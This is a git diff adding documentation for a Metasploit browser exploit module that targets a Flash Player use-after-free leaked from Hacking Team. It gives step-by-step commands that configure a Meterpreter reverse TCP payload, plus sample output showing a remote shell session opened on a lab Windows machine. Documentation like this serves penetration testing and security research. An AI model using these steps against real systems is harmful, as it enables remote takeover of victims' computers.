diff --git a/documentation/modules/exploit/multi/browser/adobe_flash_hacking_team_uaf.md b/documentation/modules/exploit/multi/browser/adobe_flash_hacking_team_uaf.md new file mode 100755 index 0000000000..ac392d61ae --- /dev/null +++ b/documentation/modules/exploit/multi/browser/adobe_flash_hacking_team_uaf.md @@ -0,0 +1,65 @@ +## Description + +This module exploits an use after free on Adobe Flash Player. The vulnerability, discovered by Hacking Team and made public as part of the July 2015 data leak, was described as an Use After Free while handling ByteArray objects. This module has been tested successfully on: + +1. Windows 7 SP1 (32-bit), IE11 and Adobe Flash 18.0.0.194. +2. Windows 7 SP1 (32-bit), Firefox 38.0.5 and Adobe Flash 18.0.0.194. +3. Windows 8.1 (32-bit), IE11 and Adobe Flash 18.0.0.194. +4. Windows 8.1 (32-bit), Firefox and Adobe Flash 18.0.0.194. +5. Linux Mint "Rebecca" (32 bits), Firefox 33.0 and Adobe Flash 11.2.202.468. + +## Verification Steps + +1. Do: ```use exploit/multi/browser/adobe_flash_hacking_team_uaf``` +2. Do: ```set payload windows/meterpreter/reverse_tcp``` +2. Do: ```set LHOST [IP]``` +3. Do: ```set SRVHOST [IP]``` +3. Do: ```set URIPATH / [PATH]``` +4. Do: ```run``` + +## Sample Output + +### IE 11 and Flash 18.0.0.194 + +``` +msf > use exploit/multi/browser/adobe_flash_hacking_team_uaf +msf exploit(adobe_flash_hacking_team_uaf) > set PAYLOAD windows/meterpreter/reverse_tcp +PAYLOAD => windows/meterpreter/reverse_tcp +msf exploit(adobe_flash_hacking_team_uaf) > set LHOST 172.16.178.160 +LHOST => 172.16.178.160 +msf exploit(adobe_flash_hacking_team_uaf) > set srvhost 172.16.178.80 +srvhost => 172.16.178.80 +msf exploit(adobe_flash_hacking_team_uaf) > set SRVPORT 80 +SRVPORT => 80 +msf exploit(adobe_flash_hacking_team_uaf) > set URIPATH / +URIPATH => / +msf exploit(adobe_flash_hacking_team_uaf) > exploit +[*] Exploit running as background job. + +[*] Started reverse TCP handler on 172.16.178.160:4444 +[*] Using URL: http://0.0.0.0:80/ +msf exploit(adobe_flash_hacking_team_uaf) > [*] Local IP: http://127.0.0.1:80/ +[*] Server started. + +msf exploit(adobe_flash_hacking_team_uaf) > +[*] 172.16.178.80 adobe_flash_hacking_team_uaf - Gathering target information. +[*] 172.16.178.80 adobe_flash_hacking_team_uaf - Sending HTML response. +[*] 172.16.178.80 adobe_flash_hacking_team_uaf - Request: /rGaaQS/ +[*] 172.16.178.80 adobe_flash_hacking_team_uaf - Sending HTML... +[*] 172.16.178.80 adobe_flash_hacking_team_uaf - Request: /rGaaQS/AsvCG.swf +[*] 172.16.178.80 adobe_flash_hacking_team_uaf - Sending SWF... +[*] Sending stage (957999 bytes) to 172.16.178.80 +[*] Meterpreter session 1 opened (172.16.178.160:4444 -> 172.16.178.80:49167) at 2017-03-26 22:51:29 +0900 + +msf exploit(adobe_flash_hacking_team_uaf) > sessions -i 1 +[*] Starting interaction with 1... + +meterpreter > sysinfo +Computer : WIN7X64TJ7XH-PC +OS : Windows 7 (Build 7601, Service Pack 1). +Architecture : x64 (Current Process is WOW64) +System Language : en_US +Domain : WORKGROUP +Logged On Users : 2 +Meterpreter : x86/win32 +```